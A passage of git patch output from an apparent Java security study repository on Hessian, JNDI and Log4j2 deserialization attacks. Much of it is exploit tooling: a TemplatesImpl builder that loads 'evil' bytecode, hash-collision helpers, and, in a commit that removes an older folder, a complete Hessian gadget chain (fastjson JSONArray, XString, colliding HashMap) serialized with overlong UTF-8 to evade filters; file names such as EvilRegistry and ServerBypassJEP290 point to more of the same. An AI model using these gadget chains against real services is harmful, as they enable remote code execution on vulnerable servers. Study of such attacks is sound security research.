< 0 ) { + // String with hash of Integer.MIN_VALUE, 0x80000000 + answer.append("\u0915\u0009\u001e\u000c\u0002"); + + if ( target == Integer.MIN_VALUE ) + return answer.toString(); + // Find target without sign bit set + target = target & Integer.MAX_VALUE; + } + + unhash0(answer, target); + return answer.toString(); + } + private static void unhash0 ( StringBuilder partial, int target ) { + int div = target / 31; + int rem = target % 31; + + if ( div <= Character.MAX_VALUE ) { + if ( div != 0 ) + partial.append((char) div); + partial.append((char) rem); + } + else { + unhash0(partial, div); + partial.append((char) rem); + } + } + + + public static byte[] ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(obj); + return baos.toByteArray(); + } + + public static void ser2file(Object obj, String fileName) throws IOException { + FileOutputStream fos = new FileOutputStream(fileName); + ObjectOutputStream oos = new ObjectOutputStream(fos); + oos.writeObject(obj); + } + + public static Object deser(byte[] bytes, String base64) throws IOException, ClassNotFoundException { + if (bytes != null) { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + }else { + byte[] decode = Base64.getDecoder().decode(base64); + ByteArrayInputStream bais = new ByteArrayInputStream(decode); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + } + } + + +} diff --git a/hessian/src/main/java/tools/TemplatesGen.java b/hessian/src/main/java/tools/TemplatesGen.java new file mode 100644 index 0000000..ccf9bac --- /dev/null +++ b/hessian/src/main/java/tools/TemplatesGen.java @@ -0,0 +1,34 @@ +package tools; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; + +import javax.xml.transform.Templates; +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class TemplatesGen { + public static Templates getTemplates(byte[] byteCode, String bytePath) throws IOException, IllegalAccessException, CannotCompileException { + byte[] evilBytes; + if (byteCode != null) { + evilBytes = byteCode; + }else { + evilBytes = Files.readAllBytes(Paths.get(bytePath)); + } + TemplatesImpl templates = new TemplatesImpl(); + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = pool.makeClass("useless"); + byte[] useless = ctClass.toBytecode(); + ReflectTools.setFieldValue(templates, "_name", "1diot9"); + ReflectTools.setFieldValue(templates, "_class", null); +// ReflectTools.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + ReflectTools.setFieldValue(templates, "_transletIndex", 0); + // 修改bytecodes数量和transletIndex,这样就不用继承AbstractTranslet + ReflectTools.setFieldValue(templates, "_bytecodes", new byte[][]{evilBytes, useless}); + return templates; + } + +} diff --git a/hessian/src/main/java/tools/UnsafeTools.java b/hessian/src/main/java/tools/UnsafeTools.java new file mode 100644 index 0000000..6579cca --- /dev/null +++ b/hessian/src/main/java/tools/UnsafeTools.java @@ -0,0 +1,15 @@ +package tools; + +import sun.misc.Unsafe; + +import java.lang.reflect.Field; + +public class UnsafeTools { + // 绕过构造方法获取对象 + public static Object getObjectByUnsafe(Class clazz) throws Exception{ + Field theUnsafe = Unsafe.class.getDeclaredField("theUnsafe"); + theUnsafe.setAccessible(true); + Unsafe unsafe = (Unsafe) theUnsafe.get(null); + return unsafe.allocateInstance(clazz); + } +} diff --git a/hessian/src/main/java/tools/sinkClass/ToStringClass.java b/hessian/src/main/java/tools/sinkClass/ToStringClass.java new file mode 100644 index 0000000..7169c10 --- /dev/null +++ b/hessian/src/main/java/tools/sinkClass/ToStringClass.java @@ -0,0 +1,15 @@ +package tools.sinkClass; + +import java.io.Serializable; + +public class ToStringClass implements Serializable { + public String toString(){ + System.out.println("toString pwned"); + return "toString pwned"; + } + + public int hashCode(){ + System.out.println("hashCode pwned"); + return 0; + } +} From aba303a8d07f51faf0848fcf52c3b6323a155c21 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Sun, 23 Nov 2025 13:55:36 +0800 Subject: [PATCH 14/16] rename folder --- hessian/HessianStudy/.gitignore | 38 ------- hessian/HessianStudy/.idea/.gitignore | 8 -- .../HessianStudy/.idea/codeStyles/Project.xml | 7 -- .../.idea/codeStyles/codeStyleConfig.xml | 5 - hessian/HessianStudy/.idea/encodings.xml | 7 -- hessian/HessianStudy/.idea/misc.xml | 14 --- hessian/HessianStudy/.idea/vcs.xml | 4 - hessian/HessianStudy/pom.xml | 36 ------ hessian/HessianStudy/ser.bin | 1 - .../src/main/java/com/hessian/Tools.java | 78 ------------- .../java/com/hessian/asServlet/Hello.java | 9 -- .../com/hessian/asServlet/HelloClient.java | 19 ---- .../com/hessian/asServlet/HelloServer.java | 18 --- .../java/com/hessian/deser/DeserTest.java | 20 ---- .../Hessian2OutputWithOverlongEncoding.java | 107 ------------------ .../com/hessian/deser/UTF_8_OverLong.java | 47 -------- .../main/java/com/hessian/pojo/Person.java | 27 ----- .../main/java/com/hessian/ser/SerTest.java | 28 ----- hessian/HessianStudy/utf8.bin | Bin 2019 -> 0 bytes hessian/dubbo/.gitignore | 38 ------- hessian/dubbo/.idea/.gitignore | 8 -- hessian/dubbo/.idea/encodings.xml | 7 -- hessian/dubbo/.idea/misc.xml | 14 --- hessian/dubbo/.idea/vcs.xml | 4 - hessian/dubbo/pom.xml | 29 ----- .../dubbo/src/main/java/org/example/Main.java | 7 -- 26 files changed, 580 deletions(-) delete mode 100644 hessian/HessianStudy/.gitignore delete mode 100644 hessian/HessianStudy/.idea/.gitignore delete mode 100644 hessian/HessianStudy/.idea/codeStyles/Project.xml delete mode 100644 hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml delete mode 100644 hessian/HessianStudy/.idea/encodings.xml delete mode 100644 hessian/HessianStudy/.idea/misc.xml delete mode 100644 hessian/HessianStudy/.idea/vcs.xml delete mode 100644 hessian/HessianStudy/pom.xml delete mode 100644 hessian/HessianStudy/ser.bin delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/Tools.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java delete mode 100644 hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java delete mode 100644 hessian/HessianStudy/utf8.bin delete mode 100644 hessian/dubbo/.gitignore delete mode 100644 hessian/dubbo/.idea/.gitignore delete mode 100644 hessian/dubbo/.idea/encodings.xml delete mode 100644 hessian/dubbo/.idea/misc.xml delete mode 100644 hessian/dubbo/.idea/vcs.xml delete mode 100644 hessian/dubbo/pom.xml delete mode 100644 hessian/dubbo/src/main/java/org/example/Main.java diff --git a/hessian/HessianStudy/.gitignore b/hessian/HessianStudy/.gitignore deleted file mode 100644 index 5ff6309..0000000 --- a/hessian/HessianStudy/.gitignore +++ /dev/null @@ -1,38 +0,0 @@ -target/ -!.mvn/wrapper/maven-wrapper.jar -!**/src/main/**/target/ -!**/src/test/**/target/ - -### IntelliJ IDEA ### -.idea/modules.xml -.idea/jarRepositories.xml -.idea/compiler.xml -.idea/libraries/ -*.iws -*.iml -*.ipr - -### Eclipse ### -.apt_generated -.classpath -.factorypath -.project -.settings -.springBeans -.sts4-cache - -### NetBeans ### -/nbproject/private/ -/nbbuild/ -/dist/ -/nbdist/ -/.nb-gradle/ -build/ -!**/src/main/**/build/ -!**/src/test/**/build/ - -### VS Code ### -.vscode/ - -### Mac OS ### -.DS_Store \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/.gitignore b/hessian/HessianStudy/.idea/.gitignore deleted file mode 100644 index 35410ca..0000000 --- a/hessian/HessianStudy/.idea/.gitignore +++ /dev/null @@ -1,8 +0,0 @@ -# 默认忽略的文件 -/shelf/ -/workspace.xml -# 基于编辑器的 HTTP 客户端请求 -/httpRequests/ -# Datasource local storage ignored files -/dataSources/ -/dataSources.local.xml diff --git a/hessian/HessianStudy/.idea/codeStyles/Project.xml b/hessian/HessianStudy/.idea/codeStyles/Project.xml deleted file mode 100644 index 919ce1f..0000000 --- a/hessian/HessianStudy/.idea/codeStyles/Project.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml b/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml deleted file mode 100644 index a55e7a1..0000000 --- a/hessian/HessianStudy/.idea/codeStyles/codeStyleConfig.xml +++ /dev/null @@ -1,5 +0,0 @@ - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/encodings.xml b/hessian/HessianStudy/.idea/encodings.xml deleted file mode 100644 index aa00ffa..0000000 --- a/hessian/HessianStudy/.idea/encodings.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/misc.xml b/hessian/HessianStudy/.idea/misc.xml deleted file mode 100644 index 556467a..0000000 --- a/hessian/HessianStudy/.idea/misc.xml +++ /dev/null @@ -1,14 +0,0 @@ - - - - - - - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/vcs.xml b/hessian/HessianStudy/.idea/vcs.xml deleted file mode 100644 index d843f34..0000000 --- a/hessian/HessianStudy/.idea/vcs.xml +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/hessian/HessianStudy/pom.xml b/hessian/HessianStudy/pom.xml deleted file mode 100644 index dd82d26..0000000 --- a/hessian/HessianStudy/pom.xml +++ /dev/null @@ -1,36 +0,0 @@ - - 4.0.0 - com.example - HessianStudy - war - 1.0-SNAPSHOT - HessianStudy Maven Webapp - http://maven.apache.org - - - junit - junit - 3.8.1 - test - - - com.caucho - hessian - 4.0.63 - - - javax.servlet - servlet-api - 2.5 - - - com.alibaba - fastjson - 1.2.24 - - - - HessianStudy - - diff --git a/hessian/HessianStudy/ser.bin b/hessian/HessianStudy/ser.bin deleted file mode 100644 index 22f2dce..0000000 --- a/hessian/HessianStudy/ser.bin +++ /dev/null @@ -1 +0,0 @@ -Ccom.hessian.pojo.Personnameagemap`1diOt9HnamemaxyyyZ \ No newline at end of file diff --git a/hessian/HessianStudy/src/main/java/com/hessian/Tools.java b/hessian/HessianStudy/src/main/java/com/hessian/Tools.java deleted file mode 100644 index 5dc74d5..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/Tools.java +++ /dev/null @@ -1,78 +0,0 @@ -package com.hessian; - -import com.sun.org.apache.xalan.internal.xsltc.compiler.Template; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; - -import java.io.IOException; -import java.lang.reflect.Array; -import java.lang.reflect.Constructor; -import java.lang.reflect.Field; -import java.nio.file.Files; -import java.nio.file.Paths; -import java.util.HashMap; - -public class Tools { - public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { - Class aClass = obj.getClass(); - Field field = null; - while (aClass != null) { - try { - field = aClass.getDeclaredField(fieldName); - break; - } catch (NoSuchFieldException e) { - aClass = aClass.getSuperclass(); - } - } - field.setAccessible(true); - field.set(obj, value); - } - - public static Object getFieldValue(Object obj, String fieldName){ - Class aClass = obj.getClass(); - Field field = null; - while (aClass != null) { - try { - field = aClass.getDeclaredField(fieldName); - field.setAccessible(true); - return field.get(obj); - } catch (NoSuchFieldException e) { - aClass = aClass.getSuperclass(); - } catch (IllegalAccessException e) { - throw new RuntimeException(e); - } - } - return null; - } - - public static TemplatesImpl getTemplatesImpl() throws IllegalAccessException, IOException { - TemplatesImpl templatesImpl = new TemplatesImpl(); - setFieldValue(templatesImpl, "_class", null); - setFieldValue(templatesImpl, "_name", "any"); - setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl()); - byte[] bytes = Files.readAllBytes(Paths.get("D://1tmp//classes//CalcAbs.class")); - setFieldValue(templatesImpl, "_bytecodes", new byte[][] {bytes}); - return templatesImpl; - } - - public static HashMap makeMap (Object v1, Object v2 ) - throws Exception { - HashMap s = new HashMap<>(); - setFieldValue(s, "size", 2); - Class nodeC; - try { - nodeC = Class.forName("java.util.HashMap$Node"); - } - catch ( ClassNotFoundException e ) { - nodeC = Class.forName("java.util.HashMap$Entry"); - } - Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, - Object.class, Object.class, nodeC); - nodeCons.setAccessible(true); - Object tbl = Array.newInstance(nodeC, 2); - Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); - Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); - setFieldValue(s, "table", tbl); - return s; - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java deleted file mode 100644 index 1b722bc..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java +++ /dev/null @@ -1,9 +0,0 @@ -package com.hessian.asServlet; - -import com.hessian.pojo.Person; - -public interface Hello { - public String sayHello(String name); - - public Person changeAge(Person person, int age); -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java deleted file mode 100644 index d978ba0..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java +++ /dev/null @@ -1,19 +0,0 @@ -package com.hessian.asServlet; - -import com.caucho.hessian.client.HessianProxyFactory; -import com.hessian.pojo.Person; - -import java.net.MalformedURLException; -import java.util.Properties; - -public class HelloClient { - public static void main(String[] args) throws MalformedURLException { - HessianProxyFactory factory = new HessianProxyFactory(); - Hello hello = (Hello) factory.create(Hello.class, "http://127.0.0.1:8081/hello"); - - String name = "1diOt9"; - System.out.println("test: " + hello.sayHello(name)); - - - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java deleted file mode 100644 index aa503e7..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java +++ /dev/null @@ -1,18 +0,0 @@ -package com.hessian.asServlet; - -import com.caucho.hessian.server.HessianServlet; -import com.hessian.pojo.Person; - -public class HelloServer extends HessianServlet implements Hello{ - @Override - public String sayHello(String name) { - System.out.println("Hello " + name); - return "Hello " + name; - } - - @Override - public Person changeAge(Person person, int age) { - person.setAge(age); - return person; - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java deleted file mode 100644 index ea17da0..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java +++ /dev/null @@ -1,20 +0,0 @@ -package com.hessian.deser; - -import com.caucho.hessian.io.Hessian2Input; -import com.hessian.pojo.Person; - -import java.io.FileInputStream; -import java.io.FileNotFoundException; -import java.io.IOException; - -public class DeserTest { - public static void main(String[] args) throws IOException { - FileInputStream fis = new FileInputStream("ser.bin"); - Hessian2Input hessian2Input = new Hessian2Input(fis); - Person obj = (Person) hessian2Input.readObject(); - hessian2Input.close(); - System.out.println(obj.getClass().getName()); - System.out.println(obj.getAge()); - - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java deleted file mode 100644 index b69ef4e..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java +++ /dev/null @@ -1,107 +0,0 @@ -package com.hessian.deser; - -import com.caucho.hessian.io.Hessian2Output; - -import java.io.IOException; -import java.io.OutputStream; -import java.lang.reflect.Field; - -public class Hessian2OutputWithOverlongEncoding extends Hessian2Output { - public Hessian2OutputWithOverlongEncoding(OutputStream os) { - super(os); - } - - @Override - public void printString(String v, int strOffset, int length) throws IOException { - int offset = (int) getSuperFieldValue("_offset"); - byte[] buffer = (byte[]) getSuperFieldValue("_buffer"); - - for (int i = 0; i < length; i++) { - if (SIZE <= offset + 16) { - setSuperFieldValue("_offset", offset); - flushBuffer(); - offset = (int) getSuperFieldValue("_offset"); - } - - char ch = v.charAt(i + strOffset); - - // 2 bytes UTF-8 - buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f)); - buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f)); - -// if (ch < 0x80) -// buffer[offset++] = (byte) (ch); -// else if (ch < 0x800) { -// buffer[offset++] = (byte) (0xc0 + ((ch >> 6) & 0x1f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } -// else { -// buffer[offset++] = (byte) (0xe0 + ((ch >> 12) & 0xf)); -// buffer[offset++] = (byte) (0x80 + ((ch >> 6) & 0x3f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } - } - - setSuperFieldValue("_offset", offset); - } - - @Override - public void printString(char[] v, int strOffset, int length) throws IOException { - int offset = (int) getSuperFieldValue("_offset"); - byte[] buffer = (byte[]) getSuperFieldValue("_buffer"); - - for (int i = 0; i < length; i++) { - if (SIZE <= offset + 16) { - setSuperFieldValue("_offset", offset); - flushBuffer(); - offset = (int) getSuperFieldValue("_offset"); - } - - char ch = v[i + strOffset]; - - // 2 bytes UTF-8 - buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f)); - buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f)); - -// if (ch < 0x80) -// buffer[offset++] = (byte) (ch); -// else if (ch < 0x800) { -// buffer[offset++] = (byte) (0xc0 + ((ch >> 6) & 0x1f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } -// else { -// buffer[offset++] = (byte) (0xe0 + ((ch >> 12) & 0xf)); -// buffer[offset++] = (byte) (0x80 + ((ch >> 6) & 0x3f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } - } - - setSuperFieldValue("_offset", offset); - } - - public int[] convert(int i) { - int b1 = ((i >> 6) & 0b11111) | 0b11000000; - int b2 = (i & 0b111111) | 0b10000000; - return new int[]{ b1, b2 }; - } - - public Object getSuperFieldValue(String name) { - try { - Field f = this.getClass().getSuperclass().getDeclaredField(name); - f.setAccessible(true); - return f.get(this); - } catch (Exception e) { - return null; - } - } - - public void setSuperFieldValue(String name, Object val) { - try { - Field f = this.getClass().getSuperclass().getDeclaredField(name); - f.setAccessible(true); - f.set(this, val); - } catch (Exception e) { - e.printStackTrace(); - } - } -} \ No newline at end of file diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java deleted file mode 100644 index 970ddeb..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java +++ /dev/null @@ -1,47 +0,0 @@ -package com.hessian.deser; - -import com.alibaba.fastjson.JSONObject; -import com.caucho.hessian.io.Hessian2Input; -import com.caucho.hessian.io.Hessian2Output; -import com.caucho.hessian.io.SerializerFactory; -import com.hessian.Tools; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.alibaba.fastjson.JSONArray; -import com.sun.org.apache.xpath.internal.objects.XString; - -import java.io.FileInputStream; -import java.io.FileOutputStream; -import java.io.IOException; -import java.util.HashMap; - -public class UTF_8_OverLong { - public static void main(String[] args) throws Exception { - TemplatesImpl templates = Tools.getTemplatesImpl(); - - JSONArray jsonArray = new JSONArray(); - jsonArray.add(templates); -// jsonArray.toString(); -// JSONArray jsonArray = new JSONArray(); -// jsonArray.add(templates); - XString xString = new XString("xx"); - - HashMap map1 = new HashMap(); - HashMap map2 = new HashMap(); - map1.put("yy",jsonArray); - map1.put("zZ",xString); - map2.put("yy",xString); - map2.put("zZ",jsonArray); - - HashMap hashMap = Tools.makeMap(map1, map2); - - FileOutputStream fos = new FileOutputStream("D://1tmp//utf8.bin"); - Hessian2OutputWithOverlongEncoding output = new Hessian2OutputWithOverlongEncoding(fos); - output.setSerializerFactory(new SerializerFactory()); - output.getSerializerFactory().setAllowNonSerializable(true); - output.writeObject(hashMap); - output.close(); - -// FileInputStream fis = new FileInputStream("utf8.bin"); -// new Hessian2Input(fis).readObject(); - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java b/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java deleted file mode 100644 index 6df809b..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java +++ /dev/null @@ -1,27 +0,0 @@ -package com.hessian.pojo; - -import java.util.HashMap; -import java.util.Properties; - -public class Person implements java.io.Serializable { - private String name; - private int age; -// private HashMap map; - - public Person() { - } - - public Person(String name, int age) { - this.name = name; - this.age = age; -// this.map = map; - } - - public int getAge() { - return age; - } - - public void setAge(int age) { - this.age = age; - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java b/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java deleted file mode 100644 index 16cc623..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java +++ /dev/null @@ -1,28 +0,0 @@ -package com.hessian.ser; - -import com.caucho.hessian.io.Hessian2Input; -import com.caucho.hessian.io.Hessian2Output; -import com.hessian.pojo.Person; - -import java.io.*; -import java.util.HashMap; - -public class SerTest { - public static void main(String[] args) throws IOException { - HashMap hashMap = new HashMap<>(); - hashMap.put("name", "maxyyy"); - - Person person = new Person("1diOt9", 20); -// FileOutputStream fos = new FileOutputStream("ser.bin"); - ByteArrayOutputStream baos = new ByteArrayOutputStream(); - Hessian2Output output = new Hessian2Output(baos); - output.writeObject(hashMap); - output.close(); - byte[] bytes = baos.toByteArray(); - - ByteArrayInputStream bais = new ByteArrayInputStream(bytes); - Hessian2Input input = new Hessian2Input(bais); - input.readObject(); - input.close(); - } -} diff --git a/hessian/HessianStudy/utf8.bin b/hessian/HessianStudy/utf8.bin deleted file mode 100644 index 21016add771ab06ef6b24b6929531d003342e9a5..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2019 zcmbtV-ESL35TA8ypY6IylQiYKv_Pp7XfK8G071|+1tpT35)u`WzOcC*&Y|;Ndv`__ zZ#=?7TMASN9#9+7FC})VP3sg1F|Yg&{40pxt}ltD8YQSY?d^R2W_E7&W^yvY>%4wp zKQD8g*Z!>WHD2Z0d>uO$_#2=a+~hlW*SQAC*ZeJC;*0zx-@|i_*C$5b+H`O5Z`!C1 z)lCg|7beSmi&wz4K(AscnA=1_^$R-_6`23&0kIN z&)Rp5S9(FVU1~5`g;^73HU0%uYd4fCnqn04MdY}K;~{nqs_UqL0#+4JCXFY!EPO~AtblOA;>UcYqtLYjZV6C<8X{r%TJ5C0&d<8(Yn1|7=L z%XBzH1+@9WC8f4~al#U@7dfm#?YxFuk zM{FnP#7?_6sCbc6woP0Kw7(V2sXO4>Xs1D)yW^WvXEra2pf`64yaCkV+eXyY=#chr z)#$@^GB|z7jy9R0!f;0&V=?Y;(yrQ;pu>d@?M9V5L>~mcWryJy9mJo+z@LUFN$7sc zQi5{ePGA?cnC{-fbRv@hovz0VD-}g z-U@e0ONqo5R9d_BX^0WHKp8_QYLND7y`Ul5hu})~1U-rH3ic^T6zscLDxpVU2Q=(~ zwz4bi)AS5LHnM#d6?l&J$FSqrRmkk`l=}DqrHflx=d@xkN;afJv~$bS^K<|X8Dw`5 zWx%f(oGQZ$STBN3&`Zo(6Pvj*KXY~dU-ZD*n*aa+ diff --git a/hessian/dubbo/.gitignore b/hessian/dubbo/.gitignore deleted file mode 100644 index 5ff6309..0000000 --- a/hessian/dubbo/.gitignore +++ /dev/null @@ -1,38 +0,0 @@ -target/ -!.mvn/wrapper/maven-wrapper.jar -!**/src/main/**/target/ -!**/src/test/**/target/ - -### IntelliJ IDEA ### -.idea/modules.xml -.idea/jarRepositories.xml -.idea/compiler.xml -.idea/libraries/ -*.iws -*.iml -*.ipr - -### Eclipse ### -.apt_generated -.classpath -.factorypath -.project -.settings -.springBeans -.sts4-cache - -### NetBeans ### -/nbproject/private/ -/nbbuild/ -/dist/ -/nbdist/ -/.nb-gradle/ -build/ -!**/src/main/**/build/ -!**/src/test/**/build/ - -### VS Code ### -.vscode/ - -### Mac OS ### -.DS_Store \ No newline at end of file diff --git a/hessian/dubbo/.idea/.gitignore b/hessian/dubbo/.idea/.gitignore deleted file mode 100644 index 35410ca..0000000 --- a/hessian/dubbo/.idea/.gitignore +++ /dev/null @@ -1,8 +0,0 @@ -# 默认忽略的文件 -/shelf/ -/workspace.xml -# 基于编辑器的 HTTP 客户端请求 -/httpRequests/ -# Datasource local storage ignored files -/dataSources/ -/dataSources.local.xml diff --git a/hessian/dubbo/.idea/encodings.xml b/hessian/dubbo/.idea/encodings.xml deleted file mode 100644 index aa00ffa..0000000 --- a/hessian/dubbo/.idea/encodings.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - \ No newline at end of file diff --git a/hessian/dubbo/.idea/misc.xml b/hessian/dubbo/.idea/misc.xml deleted file mode 100644 index 8345e46..0000000 --- a/hessian/dubbo/.idea/misc.xml +++ /dev/null @@ -1,14 +0,0 @@ - - - - - - - - - - \ No newline at end of file diff --git a/hessian/dubbo/.idea/vcs.xml b/hessian/dubbo/.idea/vcs.xml deleted file mode 100644 index d843f34..0000000 --- a/hessian/dubbo/.idea/vcs.xml +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/hessian/dubbo/pom.xml b/hessian/dubbo/pom.xml deleted file mode 100644 index 620f038..0000000 --- a/hessian/dubbo/pom.xml +++ /dev/null @@ -1,29 +0,0 @@ - - - 4.0.0 - - org.example - dubbo - 1.0-SNAPSHOT - - - 8 - 8 - UTF-8 - - - - - com.caucho - hessian - 4.0.63 - - - org.apache.dubbo - dubbo - 2.7.6 - - - \ No newline at end of file diff --git a/hessian/dubbo/src/main/java/org/example/Main.java b/hessian/dubbo/src/main/java/org/example/Main.java deleted file mode 100644 index 407f157..0000000 --- a/hessian/dubbo/src/main/java/org/example/Main.java +++ /dev/null @@ -1,7 +0,0 @@ -package org.example; - -public class Main { - public static void main(String[] args) { - System.out.println("Hello world!"); - } -} \ No newline at end of file From 8e0ae62058efbddead11a42ff5e47128a43d2e55 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Mon, 8 Dec 2025 14:41:08 +0800 Subject: [PATCH 15/16] update: JNDI --- .../.idea/copilot.data.migration.agent.xml | 6 + .../JNDI/.idea/copilot.data.migration.ask.xml | 6 + .../copilot.data.migration.ask2agent.xml | 6 + .../.idea/copilot.data.migration.edit.xml | 6 + JNDI/JNDI/.idea/misc.xml | 2 +- JNDI/{JNDI_vul => JNDI}/.idea/uiDesigner.xml | 0 JNDI/JNDI/.idea/vcs.xml | 1 + JNDI/JNDI/ClassByteGen/AAAA.class | Bin 0 -> 338 bytes JNDI/JNDI/com/sun/proxy/$Proxy0.class | Bin 0 -> 2180 bytes JNDI/JNDI/com/sun/proxy/$Proxy1.class | Bin 0 -> 1750 bytes JNDI/JNDI/pom.xml | 51 ++- .../JNDI_Develop/DNSContextFactoryTest.java | 36 -- .../src/main/java/JndiClient.java} | 6 +- .../src/main/java/LDAP/codebaseServer.java} | 54 +-- JNDI/JNDI/src/main/java/LDAP/deserServer.java | 111 ++++++ JNDI/JNDI/src/main/java/RMI/Client.java | 23 ++ JNDI/JNDI/src/main/java/RMI/EvilRegistry.java | 350 ++++++++++++++++++ JNDI/JNDI/src/main/java/RMI/MyRegistry.java | 14 + JNDI/JNDI/src/main/java/RMI/Server.java | 78 ++++ .../src/main/java/RMI/ServerBypassJEP290.java | 73 ++++ JNDI/JNDI/src/main/java/RMIServer.java | 18 + JNDI/JNDI/src/main/java/remoteObj/Hello.java | 8 + .../src/main/java/remoteObj/HelloImpl.java | 14 + .../src/main/java/tools/ClassByteGen.java | 29 ++ .../java/tools/InvocationHandlerImpl.java | 19 + JNDI/JNDI/src/main/java/tools/Payload.java | 10 + JNDI/JNDI/src/main/java/tools/PayloadGen.java | 23 ++ .../src/main/java/tools/ReflectTools.java | 71 ++++ .../src/main/java/tools/TemplatesGen.java | 35 ++ JNDI/JNDI_vul/.idea/encodings.xml | 11 - JNDI/JNDI_vul/client/pom.xml | 20 - JNDI/JNDI_vul/pom.xml | 93 ----- JNDI/JNDI_vul/server/pom.xml | 20 - .../java/factory/beanFactory/EL_test.java | 15 - .../JNDIBypassHighJavaServerEL.java | 31 -- .../factory/trustSerialFalse/ldapserver.java | 61 --- .../main/java/factory/withJDBC/rmi/dbcp.java | 48 --- .../factory/withJDBC/rmi/tomcat_dbcp.java | 36 -- JNDI/{JNDI_vul => Log4j2}/.gitignore | 0 JNDI/{JNDI_vul => Log4j2}/.idea/.gitignore | 0 .../.idea/copilot.data.migration.agent.xml | 6 + .../.idea/copilot.data.migration.ask.xml | 6 + .../copilot.data.migration.ask2agent.xml | 6 + .../.idea/copilot.data.migration.edit.xml | 6 + JNDI/Log4j2/.idea/encodings.xml | 7 + JNDI/{JNDI_vul => Log4j2}/.idea/misc.xml | 0 JNDI/{JNDI_vul => Log4j2}/.idea/vcs.xml | 0 JNDI/Log4j2/logs/app.log | 125 